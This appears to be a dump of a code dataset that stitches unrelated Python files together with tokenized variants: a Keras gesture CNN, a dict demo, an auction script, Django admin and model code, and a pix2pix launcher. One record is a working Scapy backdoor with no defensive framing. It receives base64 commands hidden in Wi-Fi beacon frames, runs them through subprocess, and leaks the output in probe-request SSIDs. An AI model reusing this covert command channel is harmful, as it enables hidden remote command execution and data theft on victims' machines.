"### Gesture Detection using CNN\r\nimport os\r\nimport tensorflow as tf\r\nimport tensorflow.keras as keras \r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout\r\n\r\nnum_classes = 3 # number of gestures\r\ntarget_size = (96,96)\r\n\r\n# Dataset \r\n#train_dir = 'data/gesture'\r\ntrain_dir = 'data/game'\r\n\r\n# Data Generator\r\nrescale = 1./255\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=rescale,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True)\r\n\r\ntrain_generator = train_datagen.flow_from_directory(\r\n train_dir,\r\n target_size=target_size,\r\n class_mode='categorical',\r\n batch_size=8,\r\n color_mode=\"rgb\",\t\r\n shuffle=True)\r\n\t\r\n# Build Model\r\nmodel = keras.models.Sequential()\r\n# block 1\r\nmodel.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu', input_shape=(96,96,3)))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n# block 2\r\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n# block 3\r\nmodel.add(Conv2D(96, kernel_size=(3, 3), padding='same', activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n# block 3\r\nmodel.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n# fully-connected layers\r\nmodel.add(Flatten())\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(num_classes , activation='softmax'))\r\n\r\n# Compile Model\r\nmodel.compile(optimizer='Adam',loss='categorical_crossentropy',metrics=['accuracy'])\r\nmodel.summary()\r\n\r\n# Train Model \r\nnum_epochs=100\r\n\r\nmodel.fit_generator(generator=train_generator, \r\n\tsteps_per_epoch=train_generator.n // train_generator.batch_size, \r\n\tepochs=num_epochs)\r\n\t\t\t\r\n# Save Model\r\nmodel.save('model/gesture_cnn.h5')\r\n",
"import os\nimport tensorflow as tf\nimport tensorflow.keras as keras\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout\nnum_classes = 3\ntarget_size = 96, 96\ntrain_dir = 'data/game'\nrescale = 1.0 / 255\ntrain_datagen = ImageDataGenerator(rescale=rescale, shear_range=0.2,\n zoom_range=0.2, horizontal_flip=True)\ntrain_generator = train_datagen.flow_from_directory(train_dir, target_size=\n target_size, class_mode='categorical', batch_size=8, color_mode='rgb',\n shuffle=True)\nmodel = keras.models.Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu',\n input_shape=(96, 96, 3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(96, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=[\n 'accuracy'])\nmodel.summary()\nnum_epochs = 100\nmodel.fit_generator(generator=train_generator, steps_per_epoch=\n train_generator.n // train_generator.batch_size, epochs=num_epochs)\nmodel.save('model/gesture_cnn.h5')\n",
"<import token>\nnum_classes = 3\ntarget_size = 96, 96\ntrain_dir = 'data/game'\nrescale = 1.0 / 255\ntrain_datagen = ImageDataGenerator(rescale=rescale, shear_range=0.2,\n zoom_range=0.2, horizontal_flip=True)\ntrain_generator = train_datagen.flow_from_directory(train_dir, target_size=\n target_size, class_mode='categorical', batch_size=8, color_mode='rgb',\n shuffle=True)\nmodel = keras.models.Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu',\n input_shape=(96, 96, 3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(96, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=[\n 'accuracy'])\nmodel.summary()\nnum_epochs = 100\nmodel.fit_generator(generator=train_generator, steps_per_epoch=\n train_generator.n // train_generator.batch_size, epochs=num_epochs)\nmodel.save('model/gesture_cnn.h5')\n",
"<import token>\n<assignment token>\nmodel.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu',\n input_shape=(96, 96, 3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(96, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=[\n 'accuracy'])\nmodel.summary()\n<assignment token>\nmodel.fit_generator(generator=train_generator, steps_per_epoch=\n train_generator.n // train_generator.batch_size, epochs=num_epochs)\nmodel.save('model/gesture_cnn.h5')\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,842 | 8272875d21b2d67ba55b112d4573a1007a491099 | #!/usr/bin/python
# python receiver.py mon0
import subprocess
import logging
import time
import base64
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
interface=sys.argv[1] #mon0
conf.iface=interface
def executeHere(cmd):
cmd = base64.b64decode(cmd)
print "Command: "+cmd
cmd = cmd.split(" ")
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
print "Command Output:"
out = out.rstrip("\n")
print out
print "Output Length: "+str(len(out))
print "Command Error:"
print err
print "Error Length: "+str(len(err))
print "Output Base64 Length: "+str(len(base64.b64encode(out)))
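    # embed the base64-encoded command output in the SSID element (Dot11Elt ID=0) of a broadcast probe request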
probereq = RadioTap()/Dot11(type=0,subtype=4,addr1="ff:ff:ff:ff:ff:ff", addr2="11:22:33:44:55:66",addr3="ff:ff:ff:ff:ff:ff")/Dot11Elt(ID=0,info=base64.b64encode(out))/Dot11Elt(ID=1,info="\x82\x84\x8b\x96")
print "Sleeping for 5 seconds..."
time.sleep(5)
print "Sending output in Probe Request..."
try:
sendp(probereq, iface=interface, verbose=0)
except Exception,e:
print "Exception: "+str(e)
print "Sending caught exception..."
exprobereq = RadioTap()/Dot11(type=0,subtype=4,addr1="ff:ff:ff:ff:ff:ff", addr2="11:22:33:44:55:66",addr3="ff:ff:ff:ff:ff:ff")/Dot11Elt(ID=0,info=base64.b64encode(str(e)))/Dot11Elt(ID=1,info="\x82\x84\x8b\x96")
sendp(exprobereq, iface=interface, verbose=0)
def packets(pkt):
try:
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 8 and pkt.info == "" : # if management frame and beacon and SSID is blank
if pkt.addr2 == "11:22:33:44:55:66":
print "AP MAC: %s | SSID: %s | Rates: %s" % (pkt.addr2, pkt.info, (pkt[Dot11Elt:2].info))
#print ':'.join(x.encode('hex') for x in pkt[Dot11Elt:2].info)
executeHere(str(pkt[Dot11Elt:2].info))
return True
except Exception,e:
print "Something bad happened..."+str(e)
while 1:
try:
print "\nSniffing for packets..."
sniff(iface=interface, stop_filter=packets)
except Exception,e:
print "Exception: "+str(e)
| [
"#!/usr/bin/python\n\n# python receiver.py mon0\n\nimport subprocess\nimport logging\nimport time\nimport base64\nimport sys\n\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\nfrom scapy.all import * \n\ninterface=sys.argv[1] #mon0\n\nconf.iface=interface\n\ndef executeHere(cmd):\n\tcmd = base64.b64decode(cmd)\n\tprint \"Command: \"+cmd\n\tcmd = cmd.split(\" \")\n\tp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tout, err = p.communicate()\n\tprint \"Command Output:\"\n\tout = out.rstrip(\"\\n\")\n\tprint out\n\tprint \"Output Length: \"+str(len(out))\n\tprint \"Command Error:\"\n\tprint err\n\tprint \"Error Length: \"+str(len(err))\n\tprint \"Output Base64 Length: \"+str(len(base64.b64encode(out)))\n\tprobereq = RadioTap()/Dot11(type=0,subtype=4,addr1=\"ff:ff:ff:ff:ff:ff\", addr2=\"11:22:33:44:55:66\",addr3=\"ff:ff:ff:ff:ff:ff\")/Dot11Elt(ID=0,info=base64.b64encode(out))/Dot11Elt(ID=1,info=\"\\x82\\x84\\x8b\\x96\")\n\n\tprint \"Sleeping for 5 seconds...\"\n\ttime.sleep(5)\n\tprint \"Sending output in Probe Request...\"\n\ttry:\n\t\tsendp(probereq, iface=interface, verbose=0)\n\texcept Exception,e:\n\t\tprint \"Exception: \"+str(e)\n\t\tprint \"Sending caught exception...\"\n\t\texprobereq = RadioTap()/Dot11(type=0,subtype=4,addr1=\"ff:ff:ff:ff:ff:ff\", addr2=\"11:22:33:44:55:66\",addr3=\"ff:ff:ff:ff:ff:ff\")/Dot11Elt(ID=0,info=base64.b64encode(str(e)))/Dot11Elt(ID=1,info=\"\\x82\\x84\\x8b\\x96\")\n\t\tsendp(exprobereq, iface=interface, verbose=0)\n\ndef packets(pkt):\n\ttry:\n\t\tif pkt.haslayer(Dot11):\n\t\t\tif pkt.type == 0 and pkt.subtype == 8 and pkt.info == \"\" : # if management frame and beacon and SSID is blank\n\t\t\t\tif pkt.addr2 == \"11:22:33:44:55:66\":\n\t\t\t\t\tprint \"AP MAC: %s | SSID: %s | Rates: %s\" % (pkt.addr2, pkt.info, (pkt[Dot11Elt:2].info))\n\t\t\t\t\t#print ':'.join(x.encode('hex') for x in pkt[Dot11Elt:2].info)\n\t\t\t\t\texecuteHere(str(pkt[Dot11Elt:2].info))\n\t\t\t\t\treturn True\n\texcept Exception,e:\n\t\tprint \"Something bad happened...\"+str(e)\n\n\nwhile 1:\n\ttry:\n\t\tprint \"\\nSniffing for packets...\"\n\t\tsniff(iface=interface, stop_filter=packets)\n\texcept Exception,e:\n\t\tprint \"Exception: \"+str(e)\n"
] | true |
99,843 | 8269e953897fa484c491d366057a5be9c81ddc70 | dict = {}
dict['one'] = '1-课程'
dict[2] = '2-课程'
tindict = {'name':'赵宗召','code':'1','site':'www.baidu.com'}
# print(dict['one'])
# print(dict[2])
# print(dict)
# print(tindict.keys())
# print(tindict.values())
print(tindict.pop('name'))
print(tindict)
#
list = ('1',2,3)
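# fromkeys builds a new dict whose keys are the tuple items, all mapped to 10; calling it through the shadowed dict instance still works because fromkeys is a classmethod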
dict2 =dict.fromkeys(list,10)
print(dict2)
#
# print(dict2.get('name'))
#
# print(2 in dict2)
#
# print(dict2.items())
#
# print(dict2.update(dict))
# print(dict2)
#
print(dict2.pop(2))
#
# print(dict2.popitem()) | [
"dict = {}\ndict['one'] = '1-课程'\ndict[2] = '2-课程'\ntindict = {'name':'赵宗召','code':'1','site':'www.baidu.com'}\n# print(dict['one'])\n# print(dict[2])\n# print(dict)\n# print(tindict.keys())\n# print(tindict.values())\nprint(tindict.pop('name'))\nprint(tindict)\n#\nlist = ('1',2,3)\ndict2 =dict.fromkeys(list,10)\nprint(dict2)\n#\n# print(dict2.get('name'))\n#\n# print(2 in dict2)\n#\n# print(dict2.items())\n#\n# print(dict2.update(dict))\n# print(dict2)\n#\nprint(dict2.pop(2))\n#\n# print(dict2.popitem())",
"dict = {}\ndict['one'] = '1-课程'\ndict[2] = '2-课程'\ntindict = {'name': '赵宗召', 'code': '1', 'site': 'www.baidu.com'}\nprint(tindict.pop('name'))\nprint(tindict)\nlist = '1', 2, 3\ndict2 = dict.fromkeys(list, 10)\nprint(dict2)\nprint(dict2.pop(2))\n",
"<assignment token>\nprint(tindict.pop('name'))\nprint(tindict)\n<assignment token>\nprint(dict2)\nprint(dict2.pop(2))\n",
"<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,844 | 6498e992f72fea4adbfcc69b6ff70baf15dee3af | import os
clear = lambda: os.system("clear")
clear()
nameBid = {}
stop = False
while not stop:
name = input("What name would you like to place on your bid?: ")
bid = float(input("What is your bid?: $"))
nameBid[name] = bid
peopleNeedingToBid = input(
"Thank you for your bid, Are there any others needing to bid? Yes or No "
).lower()
if peopleNeedingToBid == "no":
stop = True
clear()
personWithHighestBid = ""
highestBid = 0
for name in nameBid:
bid = nameBid[name]
if bid > highestBid:
personWithHighestBid = name
highestBid = bid
print(f"{personWithHighestBid} is the winner with a bid of ${round(highestBid,2)}")
| [
"import os\n\nclear = lambda: os.system(\"clear\")\nclear()\n\nnameBid = {}\nstop = False\n\nwhile not stop:\n name = input(\"What name would you like to place on your bid?: \")\n bid = float(input(\"What is your bid?: $\"))\n\n nameBid[name] = bid\n\n peopleNeedingToBid = input(\n \"Thank you for your bid, Are there any others needing to bid? Yes or No \"\n ).lower()\n\n if peopleNeedingToBid == \"no\":\n stop = True\n\n clear()\n\npersonWithHighestBid = \"\"\nhighestBid = 0\n\nfor name in nameBid:\n bid = nameBid[name]\n if bid > highestBid:\n personWithHighestBid = name\n highestBid = bid\n\nprint(f\"{personWithHighestBid} is the winner with a bid of ${round(highestBid,2)}\")\n",
"import os\nclear = lambda : os.system('clear')\nclear()\nnameBid = {}\nstop = False\nwhile not stop:\n name = input('What name would you like to place on your bid?: ')\n bid = float(input('What is your bid?: $'))\n nameBid[name] = bid\n peopleNeedingToBid = input(\n 'Thank you for your bid, Are there any others needing to bid? Yes or No '\n ).lower()\n if peopleNeedingToBid == 'no':\n stop = True\n clear()\npersonWithHighestBid = ''\nhighestBid = 0\nfor name in nameBid:\n bid = nameBid[name]\n if bid > highestBid:\n personWithHighestBid = name\n highestBid = bid\nprint(\n f'{personWithHighestBid} is the winner with a bid of ${round(highestBid, 2)}'\n )\n",
"<import token>\nclear = lambda : os.system('clear')\nclear()\nnameBid = {}\nstop = False\nwhile not stop:\n name = input('What name would you like to place on your bid?: ')\n bid = float(input('What is your bid?: $'))\n nameBid[name] = bid\n peopleNeedingToBid = input(\n 'Thank you for your bid, Are there any others needing to bid? Yes or No '\n ).lower()\n if peopleNeedingToBid == 'no':\n stop = True\n clear()\npersonWithHighestBid = ''\nhighestBid = 0\nfor name in nameBid:\n bid = nameBid[name]\n if bid > highestBid:\n personWithHighestBid = name\n highestBid = bid\nprint(\n f'{personWithHighestBid} is the winner with a bid of ${round(highestBid, 2)}'\n )\n",
"<import token>\n<assignment token>\nclear()\n<assignment token>\nwhile not stop:\n name = input('What name would you like to place on your bid?: ')\n bid = float(input('What is your bid?: $'))\n nameBid[name] = bid\n peopleNeedingToBid = input(\n 'Thank you for your bid, Are there any others needing to bid? Yes or No '\n ).lower()\n if peopleNeedingToBid == 'no':\n stop = True\n clear()\n<assignment token>\nfor name in nameBid:\n bid = nameBid[name]\n if bid > highestBid:\n personWithHighestBid = name\n highestBid = bid\nprint(\n f'{personWithHighestBid} is the winner with a bid of ${round(highestBid, 2)}'\n )\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,845 | ed8407bc10bc0a5d1b35eef33b87be7551e7f84f | from django.contrib import admin
from . import models
class ExternalLinkInline(admin.TabularInline):
model = models.ExternalLink
extra = 1
class TalkInline(admin.StackedInline):
model = models.Talk
filter_horizontal = ('speakers',)
extra = 1
class MeetupAdmin(admin.ModelAdmin):
inlines = (TalkInline, ExternalLinkInline)
readonly_fields = ('date_modified',)
class TalkAdmin(admin.ModelAdmin):
list_display = ('title', 'meetup')
readonly_fields = ['message', 'proposal_date']
def message(self, obj):
try:
message = obj.talkproposal_set.all()[0].message
except IndexError:
message = ""
return message
def proposal_date(self, obj):
try:
date = obj.talkproposal_set.all()[0].date_submitted
except IndexError:
date = ""
return date
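# Editorial sketch (not from the original file): the try/except IndexError pattern in
# TalkAdmin.message and TalkAdmin.proposal_date could also use QuerySet.first(), which
# returns None for an empty queryset. A hedged alternative, using the same
# talkproposal_set reverse relation as above:
#
#     def message(self, obj):
#         proposal = obj.talkproposal_set.first()
#         return proposal.message if proposal else ""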
admin.site.register(models.MeetupType)
admin.site.register(models.Meetup, MeetupAdmin)
admin.site.register(models.Speaker)
admin.site.register(models.Talk, TalkAdmin)
admin.site.register(models.Sponsor)
admin.site.register(models.Venue)
 | [
"from django.contrib import admin\n\nfrom . import models\n\n\nclass ExternalLinkInline(admin.TabularInline):\n model = models.ExternalLink\n extra = 1\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = ('speakers',)\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = (TalkInline, ExternalLinkInline)\n readonly_fields = ('date_modified',)\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = ('title', 'meetup')\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = \"\"\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = \"\"\n return date \n\n\n\nadmin.site.register(models.MeetupType)\nadmin.site.register(models.Meetup, MeetupAdmin)\nadmin.site.register(models.Speaker)\nadmin.site.register(models.Talk, TalkAdmin)\nadmin.site.register(models.Sponsor)\nadmin.site.register(models.Venue)",
"from django.contrib import admin\nfrom . import models\n\n\nclass ExternalLinkInline(admin.TabularInline):\n model = models.ExternalLink\n extra = 1\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = 'speakers',\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\nadmin.site.register(models.MeetupType)\nadmin.site.register(models.Meetup, MeetupAdmin)\nadmin.site.register(models.Speaker)\nadmin.site.register(models.Talk, TalkAdmin)\nadmin.site.register(models.Sponsor)\nadmin.site.register(models.Venue)\n",
"<import token>\n\n\nclass ExternalLinkInline(admin.TabularInline):\n model = models.ExternalLink\n extra = 1\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = 'speakers',\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\nadmin.site.register(models.MeetupType)\nadmin.site.register(models.Meetup, MeetupAdmin)\nadmin.site.register(models.Speaker)\nadmin.site.register(models.Talk, TalkAdmin)\nadmin.site.register(models.Sponsor)\nadmin.site.register(models.Venue)\n",
"<import token>\n\n\nclass ExternalLinkInline(admin.TabularInline):\n model = models.ExternalLink\n extra = 1\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = 'speakers',\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n\n\nclass ExternalLinkInline(admin.TabularInline):\n <assignment token>\n <assignment token>\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = 'speakers',\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = 'speakers',\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n\n\nclass TalkInline(admin.StackedInline):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass TalkAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass TalkAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n <function token>\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass TalkAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<code token>\n"
] | false |
99,846 | 97ea75fb570d5ad45b040d2ddb8b36477aeaaa10 | """-"""
SETTINGS = {
'logging': {
'level': 'WARN'
}
}
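# Usage sketch (editorial addition, not part of the original module): one way a
# consumer might apply the nested logging level defined above.
#
#     import logging
#     logging.basicConfig(level=SETTINGS['logging']['level'])  # 'WARN'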
| [
"\"\"\"-\"\"\"\n\nSETTINGS = {\n 'logging': {\n 'level': 'WARN'\n }\n}\n",
"<docstring token>\nSETTINGS = {'logging': {'level': 'WARN'}}\n",
"<docstring token>\n<assignment token>\n"
] | false |
99,847 | 4a82d5c383d0ac51b3579d3cee1ecdd53c0879db | from django.db import models
import uuid
class Task(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    goal = models.CharField(max_length=255)
deadline = models.DateField()
payment = models.PositiveIntegerField()
user_name = models.CharField(max_length=255, default='')
user_email = models.EmailField()
verificator_name = models.CharField(max_length=255, default='')
verificator_email = models.EmailField()
    verified = models.BooleanField(default=False)
    closed = models.BooleanField(default=False)
    paid = models.BooleanField(default=False)
    # card_info: placeholder for card/payment details (not implemented)
def __str__(self):
return f'Goal: {self.goal}, user: {self.user_email}'
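# Illustration only (editorial addition): given the fields above, a Task row could be
# created through the Django ORM roughly like this. All literal values are made up.
#
#     from datetime import date
#     Task.objects.create(
#         goal='Finish the report',
#         deadline=date(2024, 1, 31),
#         payment=100,
#         user_email='[email protected]',
#         verificator_email='[email protected]',
#     )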
| [
"from django.db import models\n\nimport uuid\n\n\nclass Task(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n goal = models.CharField(max_length = 255)\n deadline = models.DateField()\n payment = models.PositiveIntegerField()\n user_name = models.CharField(max_length=255, default='')\n user_email = models.EmailField()\n verificator_name = models.CharField(max_length=255, default='')\n verificator_email = models.EmailField()\n verified = models.BooleanField(default = False)\n closed = models.BooleanField(default=False)\n paid = models.BooleanField(default=False)\n #card_info\n\n def __str__(self):\n return f'Goal: {self.goal}, user: {self.user_email}'\n\n",
"from django.db import models\nimport uuid\n\n\nclass Task(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n goal = models.CharField(max_length=255)\n deadline = models.DateField()\n payment = models.PositiveIntegerField()\n user_name = models.CharField(max_length=255, default='')\n user_email = models.EmailField()\n verificator_name = models.CharField(max_length=255, default='')\n verificator_email = models.EmailField()\n verified = models.BooleanField(default=False)\n closed = models.BooleanField(default=False)\n paid = models.BooleanField(default=False)\n\n def __str__(self):\n return f'Goal: {self.goal}, user: {self.user_email}'\n",
"<import token>\n\n\nclass Task(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n goal = models.CharField(max_length=255)\n deadline = models.DateField()\n payment = models.PositiveIntegerField()\n user_name = models.CharField(max_length=255, default='')\n user_email = models.EmailField()\n verificator_name = models.CharField(max_length=255, default='')\n verificator_email = models.EmailField()\n verified = models.BooleanField(default=False)\n closed = models.BooleanField(default=False)\n paid = models.BooleanField(default=False)\n\n def __str__(self):\n return f'Goal: {self.goal}, user: {self.user_email}'\n",
"<import token>\n\n\nclass Task(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return f'Goal: {self.goal}, user: {self.user_email}'\n",
"<import token>\n\n\nclass Task(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,848 | f98b78f2e0fbf87e11e3783dc8422f45641cfd59 | from datasets import get_colorize_w_train_dataset, get_colorize_w_test_dataset
from pix2pix_training import training_session
if __name__ == "__main__":
train_ds = get_colorize_w_train_dataset()
test_ds = get_colorize_w_test_dataset()
fit = training_session("_colorize_w")
fit(
train_ds, 150, test_ds,
)
| [
